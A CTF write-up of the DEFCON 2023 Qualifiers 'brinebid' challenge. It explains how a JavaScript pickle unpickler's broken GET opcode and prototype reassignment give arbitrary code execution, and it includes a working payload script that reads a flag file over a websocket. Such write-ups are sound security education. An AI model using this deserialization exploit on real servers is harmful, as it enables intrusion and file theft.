
On May 27 until May 29, I had the pleasure to join Shellphish in the DEFCON CTF Qualifiers of 2023. I wanted to highlight one of the challenges called brinebid that I ended up working on as well as finding and submitting the flag for. It is a really interesting challenge, combining web security with some reverse engineering a virtual machine (VM), as well as exploiting a vulnerability in the VM to get arbitrary code execution.

If you want to follow along, you can download the challenge files below:

Download Challenge


A client application written in Python

The main application that we are given is a Python program that implements some kind of auction program where you can buy and sell properties in Vegas.

While the ASCII art UI is pretty cool, the application itself is not really that interesting, except for the following detail. It communicates with a server through a websocket. Every message type has its dedicated class:

The interesting part of this, is that every message object is serialized and deserialized using pickle:

This has some nice security implications, which we will dive into now.

A refresher on Python Pickle

Pickle is a Python-specific package that allows you to serialize any Python object to a sequence of bytes and back. The format that it uses is quite interesting. Rather than having an object notation (e.g., similar to JSON) or a schema that it follows per type of object (e.g., similar to protobuf), it is a format that works with stack-based instructions to instantiate and initialize new objects. In essence, this means a Pickle deserializer is similar to a basic virtual machine (VM) interpreter that decodes and evaluates all the instructions in the pickle byte string, and returns the final object that is produced in the end.

A typical example pickle program can be found below:

PROTO      3                        # protocol version 3

GLOBAL     '__main__ MyClass'       # Instantiate a new __main__.MyClass object without any arguments.

EMPTY_DICT                          # Create a new empty dict.
    BINUNICODE 'x'                  # Set "x" to 123
    BININT1    123

    BINUNICODE 'y'                  # Set "y" to "hello"
    BINUNICODE 'hello'

    BINUNICODE 'z'                  # Set "z" to (1, 2, 3)
    BININT1    1
    BININT1    2
    BININT1    3

BUILD                               # Move all key-value pairs of the dict into the MyClass object.

STOP                                # Return

Some basic instructions that you can see in this program are instructions that push primitives such as integers (BININT1 123) and strings (BINUNICODE 'hello') on the stack. We can also see it can push new empty tuples (EMPTY_TUPLE) and dictionaries (EMPTY_DICT). New objects of arbitrary types can also be instantiated (GLOBAL followed by NEWOBJ), and fields within objects can be set (e.g., using SETITEM and/or BUILD). By composing these instructions in the right order with the right values, a “program” can be created that instantiates a new object of a specific type and assigns all necessary fields within the object to their appropriate values.

For completeness, the example Pickle program is equivalent to the following Python code instantiating a MyClass object:

obj = MyClass()
obj.x = 123
obj.y = "hello"
obj.z = (1, 2, 3)

Some really nice Python modules and references that explain the format in much greater detail and allow you to play around with the format can be found below:

  • pickle: The main Pickle package as used in Python.
  • pickletools: Additional tooling to inspect and disassemble Pickle byte strings.
  • pickleassem: Third party library to manually craft new Pickle byte strings.

The great advantage of Pickle is that it is very easy to use. It requires only one call to serialize any object to bytes and only one call to deserialize bytes back to any object.

binary_data = pickle.dumps(obj)
new_obj = pickle.loads(binary_data)

However, it is often regarded as an unsafe package. Depending on what type of object is referenced in the pickle byte-string, it may instantiate any class. Instantiating arbitrary classes can lead to arbitrary code execution, as constructors of classes can contain any code.

But for this challenge, there is a twist.

A server written in… Javascript?

We have a client written in Python that sends Pickled objects to the server. When we are dealing with Pickles, we expect both the sender as well as the receiver of the pickled objects to be implemented in Python. Indeed, Pickle is a Python-specific format, no other language can really instantiate Python objects. However, to our surprise, we find that the server is implemented in Javascript instead!

No Javascript engine has a built-in Pickle deserializer, and as such, to be able to still send and receive messages that the client application can understand, the challenge authors included a custom Unpickler implementation in main.bundle.js that is able to deserialize Pickled objects. In particular, when we beautify the minified Javascript code (e.g., using, we can see this class has a prototype that defines a method _handle_opcode, which is the main driving force for evaluating individual instructions in an incoming Pickle byte-string:

Every possible message type that is sent by the client also has an equivalent Javascript class:

Note how all the types are registered in a global PICKLE_GLOBAL_SCOPE field. This is the server’s way to map all names of the supported Python types to their Javascript equivalent constructors. This also has the effect that it acts as a list of allowed types that can be referenced by the GLOBAL opcode, as can be seen in the implementation of this opcode in _handle_opcode:

What are the allowed types? A simple search can tell us that:

It seems the list of allowed types is rather strict. How do we get anything interesting running?

Main Exploit Idea

In Javascript, everything is an object. This includes the program code itself. When you define a function, what actually happens behind the scenes is a new Function object is created with the provided code as its body. Trying this in any Javascript REPL (such as NodeJS), we can see this in action:

> var x = function() {
    return 1337;
> x
[Function: x]

There is another way in Javascript to create such a Function object, and that is by initializing one explicitly using the Function’s constructor. This constructor takes a string as argument, which is parsed as Javascript code and used as the body of the function:

> var x = new Function("return 1337;");
[Function: anonymous]

Function objects can be called like any other function invocation:

> x();

If we can trick the virtual machine into creating a new Function object with a string that we control, and then let it call it, we have arbitrary code execution on the server side.

Two interesting Pickle opcodes seem to be able to facilitate such functionality. If we look at the implementation of NEWOBJ and REDUCE, we see both pop both a function or a constructor from the stack, accompanied with the arguments to pass along, and then invoke them (either with the new keyword or without):

Thus, theoretically, we can use the NEWOBJ and REDUCE opcodes, together with an instruction like BINUNICODE "console.log(1337)" to both instantiate a new Function object, as well as call it. This translates to roughly the following Pickle program:

GLOBAL     'Function'
BINUNICODE 'console.log(1337);'

The main problem however is: How do we get the constructor of Function on the stack? As mentioned before, in the normal Pickle package, the GLOBAL opcode is responsible for pushing any symbol on the stack (and thus also constructors). However, as we have also seen before, GLOBAL only allows for very specific types to be referenced and does not allow referencing the Function type (i.e., there is no "Function" key in PICKLE_GLOBAL_SCOPE).

How do we get around this?

The Vulnerability

Reading arbitrary fields using the GET opcode

The key insight to getting around the PICKLE_GLOBAL_SCOPE allow-list lies in the fact that some opcodes in the Javascript implementation of the Pickle virtual machine are not quite exactly following specification. In particular, the implementation of the GET opcode is completely broken.

The GET opcode takes a string as operand, which is used as an identifier of a variable to read from or write to.

GET "abc"       # Push the contents of the variable with name "abc"

Similarly, there is a PUT opcode that pops a value from the stack instead, and writes it into the specified variable:

PUT "abc"       # Assign 1234 to variable "abc"

Normally, these variables are stored somewhere in some separate temporary memory. However, in this Javascript implementation, this memory is the this object itself:

Since everything in Javascript is an object, and every object in Javascript is like a dictionary, any field in an object can also be referenced by its name as a string. This makes the following two statements equivalent:

var value = this['field_name'];
var value = this.field_name; 

This implies GET can be used to read from any field defined in the this object, including the fields defined in the Unpickler type itself, not just the variables introduced by the Pickle byte-string.

Object Prototypes and Constructors

Why is this bad?

Unpickler is a type defined in Javascript, and thus it has an Object prototype. A prototype is essentially a template that every instance of an object in Javascript is initialized with. Every prototype defines a special field called constructor, which, as its name implies, contains the function that constructs a new instance of the type. We can verify this in a REPL:

> function Unpickler() { /* ... not important ... */ }
> var x = new Unpickler();
> x
Unpickler {}
> var y = new x.constructor();
> y
Unpickler {}

Since we can access any field in the this object, using a Pickle instruction like GET "constructor" will push the constructor of Unpickler:

GET "constructor"     # push this["constructor"].
EMPTY_TUPLE           # no constructor arguments.
NEWOBJ                # instantiate object.

This is not quite the constructor we need however. Indeed, we set out to find a way to create new Function objects, and the one we obtained builds new Unpickler instances instead. However, since Unpickler.constructor is a function itself, and functions are objects, it is initialized with the prototype of the Function type, and thus also defines a constructor. However, this time it contains the constructor of the Function type instead. Thus, if we can find a way to access the constructor of the constructor of the this object (i.e., this.constructor.constructor), we end up with the constructor of the Function type instead, which is exactly what we need.

How do we create Pickle code that pushes this.constructor.constructor onto the stack? A naive thought would be chaining two GET opcodes in sequence:

GET "constructor"
GET "constructor"

Unfortunately, this does not quite work. Recall that the GET opcode is hardwired to read from the this object, and not from the top of stack.

Chaining two GET opcodes thus merely pushes two copies of Unpickler.constructor. And while there is a SETITEM opcode that can write to fields in arbitrary objects on the stack, there is no GETITEM counterpart implemented that allows for reading fields from arbitrary objects easily.

We got stuck on this for hours, trying to find many different primitives that would eventually allow us to chain the dereferences, to no avail.

Abusing the Super Constructor

One of the Shellphish teammates suddenly recognized something interesting. Every Pickle class constructor was implemented with some Javascript calling a global function called super_constructor. For example, the List class is defined as follows:

super_constructor happens to be the very first function that is defined in this large Javascript file:

The function first initializes the object with the template of the requested type (line 4). Then, it obtains a superclass of the requested type (line 6). This can be thought of as the base class similar to other object-oriented languages like Java or C#. Finally, it calls the constructor of this superclass with the provided arguments (line 8).

This setup of emulated “object inheritance” has an interesting implication. If we can somehow get the super_class variable to contain a reference to this.constructor, we would effectively be evaluating (this.constructor).constructor, which matches exactly the code we were looking to execute, and thus call the constructor of Function.

It so turns out we can do this by reassigning the prototype of one of the whitelisted benign types in the PICKLE_GLOBAL_SCOPE (such as builtins.List). Similar to constructor, every object in Javascript also contains a special field called prototype, which references the object that contains the prototype that the object was based on. If we reassign this field to the value of this.constructor (and this is possible, because everything in a Javascript object is fully mutable), then creating a new instance of such a type will make the call to Object.getPrototypeOf(clazz.prototype) in our super constructor return the prototype of this.constructor, which is the prototype of Function. The subsequent call to will therefore be equal to (this.constructor.prototype), which is exactly equivalent to calling this.constructor.constructor!

We can verify this in the Javascript REPL, and indeed the theory works:

Let’s go write that exploit!

Putting it all together

To summarize all the technical details from the above, we need to implement a Pickle program that does the following:

  1. Replace the prototype field of an allowed type constructor (such as List) with this.constructor.
  2. Instantiate a new instance of this type, using the Javascript code we want to execute as a string argument.
  3. Treat the created object as a function and call it.

To perform the first step in Pickle instructions, we can use the SETITEM opcode:

SETITEM allows us to write to arbitrary fields in arbitrary objects on the stack. Similar to GET and PUT, this includes assigning values to special fields like constructor or prototype. The first step can thus be implemented using the following Pickle code:

GLOBAL  "builtins.List"
UNICODE "prototype"
GET     "constructor"

For the second part, we need to instantiate a new List object with our own Javascript code. Note that at this point we do not need to push the reference to builtins.List again. This is because the previous SETITEM actually does not pop the object that it is modifying from the stack, which means the reference to builtins.List is still on the stack:

UNICODE "console.log('washi was here');"

Finally, we need to execute it. For this, we can simply push an empty list to signify no arguments are passed onto the function, and then use the REDUCE opcode to call it:


And that’s all there is to it! The final payload is actually quite small and not even that complicated.

We can use the pickleassem Python package to construct our payload easily:

from pickleassem import PickleAssembler

pa = PickleAssembler(proto=3)

pa.push_global("builtins", "list")
pa._payload += pickleassem.GET + b"constructor\x0a"

pa.push_unicode("console.log('washi was here');")


payload = pa.assemble()

Then, if we send the resulting Pickle over the websocket we get the following:

While the server throws an error because of the relatively malformed Pickle code, we can clearly see that the string washi was here was printed as well, implying that the console.log call indeed executed, confirming our ability to run arbitrary Javascript code on the server!

Final Script

We have code execution, the only tricky thing left is actually sending the contents of /opt/flag.txt back to us via the websocket.

It so turns out Deno (the Javascript engine running behind the scenes) defines a function Deno.readFileSync, allowing us to read arbitrary files on the remote system. It also turns out that in the global scope of main.bundle.js, there is an object called current_client which defines a field ws holding a reference to the websocket that is used for all the communication.

Thus, we can simply use these two elements to both read /opt/flag.txt, and send it back to our own machine, with this Javascript one-liner: TextDecoder()).decode(Deno.readFileSync('/opt/flag.txt')));

The final script looks like the following:

import urllib.parse
import base64
from websockets.sync.client import connect
import pickleassem
from pickleassem import PickleAssembler

pa = PickleAssembler(proto=3)

pa.push_global("builtins", "list")
pa._payload += pickleassem.GET + b"constructor\x0a"

pa.push_unicode(" TextDecoder()).decode(Deno.readFileSync('/opt/flag.txt')));")


payload = pa.assemble()


ticket = "ticket{[redacted]}"
ticket_url = urllib.parse.quote(ticket)
with connect(
) as ws:
    data = base64.b64encode(payload).decode('latin-1')
    print('sending b64 pickle:')

    data = ws.recv()
    data = base64.b64decode(data)

… revealing the flag:

Final words

I found this challenge to be very interesting. While I am not typically very fond of web challenges in general, this challenge combines web security in the form of Javascript prototype pollution with some reverse engineering and bug hunting of a basic virtual machine, two topics I love. It also taught me one or two things about the inner workings of Pickle, something I never really looked into much.

The challenge also makes me wonder why Javascript is still allowing for crucial fields like constructor and prototype to be reassigned to other values of our choice, given the serious security implications it has. I presume it is still there for backward compatibility, but who knows…

Thanks for reading and happy hacking! And for the ones that are attending DEFCON this year, maybe I will see you in Vegas!